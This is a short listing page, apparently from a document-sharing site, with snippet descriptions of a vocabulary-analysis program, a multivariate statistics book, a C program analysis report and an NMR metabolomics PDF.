    The Range program is used for analysing the vocabulary load of texts. It can tell you how much and what vocabulary occurs in a particular text or group of texts. It used to be called VORDS, FVORDS, ...

    Analysis of Multivariate and High-Dimensional Data 532pages

    This book is about data in many – and sometimes very many – variables and about analysing such data. The book attempts to integrate classical multivariate methods with contemporary methods suitable ...

    数据结构课程设计 程序分析

    The results of analysing program file "ProgAnal.C": Lines of code :180 Lines of comments: 63 Blank lines: 52 Code Comments Space 61% 21% 18% The program includes 9 functions. The average ...

    metabolomics_data_using_OPLS-DA

    emuch.net]Analysing_NMR_metabolomics_data_using_OPLS-DA.pdf

Global site tag (gtag.js) - Google Analytics